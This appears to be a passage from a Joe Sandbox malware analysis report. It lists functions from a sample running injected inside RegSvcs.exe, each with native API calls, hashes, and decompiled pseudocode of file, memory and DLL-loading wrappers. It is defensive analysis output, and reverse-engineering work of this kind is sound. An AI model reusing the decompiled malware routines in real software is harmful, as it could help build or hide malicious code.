Function 02B65364 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B65421

Memory Dump Source

Source File: 00000002.00000002.305738250.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b60000_image.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4faee713cc9180776b51ac54d0e33383742461b7187f0eb4f4065d95554bc783
Instruction ID: 1c1faf31c9e79088a61db55215b9d7e689700984f988083ef03556e43ac49baf
Opcode Fuzzy Hash: 4faee713cc9180776b51ac54d0e33383742461b7187f0eb4f4065d95554bc783
Instruction Fuzzy Hash: AD41E2B1C00218CFDB24CFA9C8847DEBBF5BF48309F6484AAD409AB255DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 052A33F0 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 052A34B1

Memory Dump Source

Source File: 00000002.00000002.308026235.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52a0000_image.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 50c09d67dd54546e050232471c1926d8588423a3383a778393f09acb2df70c31
Instruction ID: c945db60067a04071a7953d158d8e423dde5541e2cc9a9d18dfeb564750df93b
Opcode Fuzzy Hash: 50c09d67dd54546e050232471c1926d8588423a3383a778393f09acb2df70c31
Instruction Fuzzy Hash: 024127B5A103058FCB14CF99C489AAEBBF5FF98314F24C899D519AB321D774A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B6A5C0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B6C63E,?,?,?,?,?), ref: 02B6C6FF

Memory Dump Source

Source File: 00000002.00000002.305738250.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b60000_image.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0b85aaf215cb7ed468184765138e24b984cc066457ea2feeaf91fc4d99a15e76
Instruction ID: 4d81dd871e78e5450fd56e305cbf38253fc6262c7eebb7576947165bcdb72cb7
Opcode Fuzzy Hash: 0b85aaf215cb7ed468184765138e24b984cc066457ea2feeaf91fc4d99a15e76
Instruction Fuzzy Hash: 9F21E5B59002089FDB10CF99D588AEEBBF8EB48314F14845AE954B3310D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02B6C670 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B6C63E,?,?,?,?,?), ref: 02B6C6FF

Memory Dump Source

Source File: 00000002.00000002.305738250.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b60000_image.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 86a9d3d5ad8ac42ab91a1f81ce6ce7bc84e5509d5d89ea16398b97563bd00f36
Instruction ID: e5814caaea94209268f080ebf10314fd0ed3b6a011843c9a06e293a178b2f0ff
Opcode Fuzzy Hash: 86a9d3d5ad8ac42ab91a1f81ce6ce7bc84e5509d5d89ea16398b97563bd00f36
Instruction Fuzzy Hash: 2821B0B69002499FDB10CFA9D984AEEBBF8EF48324F14845AE954A3710D378A954CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02B6A238 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B6A711,00000800,00000000,00000000), ref: 02B6A922

Memory Dump Source

Source File: 00000002.00000002.305738250.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b60000_image.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f8bd2c90d07d5396d2a9de4f5741800bb8550d06d9a807cd903c79b9f579fca6
Instruction ID: bb3b7f9aebb15ec815562aed6bea6e688cf252deaadb4542fbe79bb6acfb5661
Opcode Fuzzy Hash: f8bd2c90d07d5396d2a9de4f5741800bb8550d06d9a807cd903c79b9f579fca6
Instruction Fuzzy Hash: 3B1114B69002099FDB10CF9AD448BEEFBF4EB88314F14846ED925B7640C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B6A8B1 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B6A711,00000800,00000000,00000000), ref: 02B6A922

Memory Dump Source

Source File: 00000002.00000002.305738250.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b60000_image.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8a8e089af03fc0afc48c261d299d5e427e48177e3f52570da52884efd0e901e1
Instruction ID: b7b214f6adb7ec76ff5e6f599d745fb928a665ba1e45568da60c95ab755c4b71
Opcode Fuzzy Hash: 8a8e089af03fc0afc48c261d299d5e427e48177e3f52570da52884efd0e901e1
Instruction Fuzzy Hash: 681103B69002489FCB10CF9AD448BEEFBF4EB88324F15846ED565B7640C778A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B6A629 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B6A696

Memory Dump Source

Source File: 00000002.00000002.305738250.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b60000_image.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f053017ad121449c37299863f008c818b2fcee2f89c1728a0abea9f760bc6437
Instruction ID: 761cd5279e19a239155f6b78eb230f89cdb481b46387fd3d05b90c4dfb8923c9
Opcode Fuzzy Hash: f053017ad121449c37299863f008c818b2fcee2f89c1728a0abea9f760bc6437
Instruction Fuzzy Hash: 701102B6C002498FCB10CF9AD548BDEFBF4EF88224F14846AD529B7610D378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B6A630 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B6A696

Memory Dump Source

Source File: 00000002.00000002.305738250.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b60000_image.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: acabc8d35c7d09bd57d04ce515d3740cd2658c3e69cfc3e3322f60bc2e1070ee
Instruction ID: b74f9edb0551ac684e10f31c04d65bb0493b1370a4baac2dfc9c1b77f054187c
Opcode Fuzzy Hash: acabc8d35c7d09bd57d04ce515d3740cd2658c3e69cfc3e3322f60bc2e1070ee
Instruction Fuzzy Hash: D5110FB6C002498FCB10CF9AD448BDEFBF4EB88224F14846AD529B7610C378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 052A1080 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 052A10DD

Memory Dump Source

Source File: 00000002.00000002.308026235.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52a0000_image.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 3c03b9d5e338259502ead48d39c2b6630345f099ee9506c9c4b90f05423472a0
Instruction ID: ed317bd56479c39dbd8d09eae2ab85c688f5b0111b5c73bbce82dcc6a7f9bafa
Opcode Fuzzy Hash: 3c03b9d5e338259502ead48d39c2b6630345f099ee9506c9c4b90f05423472a0
Instruction Fuzzy Hash: 4B11E2B58002499FDB20DF9AD585BDEFBF8FB48324F14851AD929A7700C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 5556, Parent PID: 7008COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	2.8%
Signature Coverage:	5.6%
Total number of Nodes:	604
Total number of Limit Nodes:	71

Executed Functions

Function 00418690 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418693
0x0041869f
0x004186a7
0x004186ac
0x004186b2
0x004186cd
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

1:A, xrefs: 004186AC, 004186B8
r=A, xrefs: 004186CD, 004186D4
r=A, xrefs: 004186B2, 004186C0

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b5c
0x00409b5f
0x00409b64
0x00409b69
0x00409b73
0x00409b78
0x00409b7b
0x00409b7d
0x00409b85
0x00409b8a
0x00409b8a
0x00409b91
0x00409b99
0x00409b9c
0x00409b9e
0x00409bb2
0x00000000
0x00409bb4
0x00409bba
0x00409b6e
0x00409b6e
0x00409b6e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185DA Relevance: 1.5, APIs: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004185DA(void* __edx, intOrPtr _a5, HANDLE* _a9, long _a13, struct _EXCEPTION_RECORD _a17, struct _ERESOURCE_LITE _a21, struct _GUID _a25, long _a29, long _a33, long _a37, long _a41, void* _a45, long _a49) {
				intOrPtr _v117;
				long _t23;
				void* _t34;

				asm("aad 0x57");
				_pop(_t38);
				_v117 = _v117 - __edx;
				_t17 = _a5;
				_t5 = _t17 + 0xc40; // 0xc40
				E004191E0(_t34, _a5, _t5,  *((intOrPtr*)(_a5 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a9, _a13, _a17, _a21, _a25, _a29, _a33, _a37, _a41, _a45, _a49); // executed
				return _t23;
			}

0x004185da
0x004185dc
0x004185df
0x004185e3
0x004185ef
0x004185f7
0x0041862d
0x00418631

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c0b9d99cfee0bf06326a741d588715dff926fcdca5a7855b4aec4ac338735136
Instruction ID: 265510b704117850d9db81d84192c78d40c004e323d34cb8c2930c1455776cf5
Opcode Fuzzy Hash: c0b9d99cfee0bf06326a741d588715dff926fcdca5a7855b4aec4ac338735136
Instruction Fuzzy Hash: EA01DDB2200108BBCB08CF99DC85EEB37A9AF8C354F158209FA0D97241C630E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004185E0 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185ef
0x004185f7
0x0041862d
0x00418631

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C0 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0x8bec97b5
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187cf
0x004187d7
0x004187f9
0x004187fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187BF Relevance: 1.5, APIs: 1, Instructions: 27
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004187BF(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;

				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0x8bec97b5
				E004191E0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x004187c3
0x004187cf
0x004187d7
0x004187f9
0x004187fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6be5816448aa7bd0b0c72cc8a8cbb480adc2ad7d6583601fd42d4bffe38c2044
Instruction ID: d826881db198b344f564eca01144d9971d3feb2b24ffafc9c74f20cd089f0150
Opcode Fuzzy Hash: 6be5816448aa7bd0b0c72cc8a8cbb480adc2ad7d6583601fd42d4bffe38c2044
Instruction Fuzzy Hash: F7E06DB520414AABCB14DF98DC84CE777A9FF88354B15864EFD4C97202C634E855CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041870A Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041870A(void* __edx) {
				long _t9;
				void* _t14;

				_t6 =  *0xFFFFFFFFD69CE4C5;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x409763
				E004191E0(_t14,  *0xFFFFFFFFD69CE4C5, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose( *0xFFFFFFFFD69CE4C9); // executed
				return _t9;
			}

0x00418713
0x00418716
0x0041871f
0x00418727
0x00418735
0x00418739

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 37d2108a26734c71c32290ac84b980ff2db63a3c327fa928d9c5d28780ee5ce0
Instruction ID: b11299bada98e7b8d52bd02139f8ee7eade78f299dec9c4252357619e7941d30
Opcode Fuzzy Hash: 37d2108a26734c71c32290ac84b980ff2db63a3c327fa928d9c5d28780ee5ce0
Instruction Fuzzy Hash: 4DE08C356002007BEB21DBB48C86EEB7B29EF44290F154099FD599B282D530AA50C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00418710 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418713
0x00418716
0x0041871f
0x00418727
0x00418735
0x00418739

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A898F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A898FA

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65149fa96a7d7f9274a298d61dc5adbe186c059928f21c0927ae22e73c9ba68d
Instruction ID: 93ef419e791fb7c85cac912fa7d169020295adf71da144a67933eb264fbbddf2
Opcode Fuzzy Hash: 65149fa96a7d7f9274a298d61dc5adbe186c059928f21c0927ae22e73c9ba68d
Instruction Fuzzy Hash: 3E90026170100502D60171694504616004A97D0381F91C032A1014555ECA658DD2F171

Uniqueness

Uniqueness Score: -1.00%

Function 00A89860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8986A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b637a0cb25348edc978b93456190eba8ed5d9613ade9c9b6770426bce379491
Instruction ID: bcfc907c5fbb5e1e8a08bad1fcb64d963e6f90390df8683fb52d5d03ea7fc5df
Opcode Fuzzy Hash: 5b637a0cb25348edc978b93456190eba8ed5d9613ade9c9b6770426bce379491
Instruction Fuzzy Hash: CD90027130100413D61161694604707004997D0381F91C422A0414558D96968D92F171

Uniqueness

Uniqueness Score: -1.00%

Function 00A89840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8984A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e75a98d50ba38fb49637320d24ea58110d9ec21ca30f372e4488a18f86deba2c
Instruction ID: 792b8314dfc4723f2add4394a8128058fcd81873503cd9c9fd0f2f7dcdddfeb6
Opcode Fuzzy Hash: e75a98d50ba38fb49637320d24ea58110d9ec21ca30f372e4488a18f86deba2c
Instruction Fuzzy Hash: 19900261342041525A45B16945045074046A7E0381791C022A1404950C85669C96E671

Uniqueness

Uniqueness Score: -1.00%

Function 00A899A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A899AA

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b41f3ad8532fcf91cc42bb0b64f7ffc5915339b6721acb725c4de033dae7d81
Instruction ID: 9223c7b4dfe3fec46476872ef386d22b5ec610f4423e9581e46f4513ba3f06ff
Opcode Fuzzy Hash: 7b41f3ad8532fcf91cc42bb0b64f7ffc5915339b6721acb725c4de033dae7d81
Instruction Fuzzy Hash: EA9002A134100442D60061694514B060045D7E1341F51C025E1054554D8659CC92B176

Uniqueness

Uniqueness Score: -1.00%

Function 00A89910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8991A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d9ab250e2babb1241eda23f0ea8c634aa5886fa45fd31bb490f237b9be2198d
Instruction ID: 51835932e74360d9469b10b4a00536f210cfb00ce369e101c531f953c59c384e
Opcode Fuzzy Hash: 6d9ab250e2babb1241eda23f0ea8c634aa5886fa45fd31bb490f237b9be2198d
Instruction Fuzzy Hash: CA9002B130100402D64071694504746004597D0341F51C021A5054554E86998DD5B6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00A89A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A89A2A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a6d12f351fca1c7414f0ee09ca5d75729a219452cf1a0f2083cc30713531cfb
Instruction ID: 4c3950cb99799db054696b0d7db2b3b4d407e9e2e4da29959aca44aff7eb4ad4
Opcode Fuzzy Hash: 8a6d12f351fca1c7414f0ee09ca5d75729a219452cf1a0f2083cc30713531cfb
Instruction Fuzzy Hash: 74900261701000424640717989449064045BBE1351751C131A0988550D85998CA5A6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00A89A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A89A0A

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e996f5de2109fa9ce04162c5e50e1914f99b840143f1721ae27a51b56ce327b5
Instruction ID: 8abd5824acfecd14cda83d4d1a307e8a39ef45635f321dff43363f79327a053f
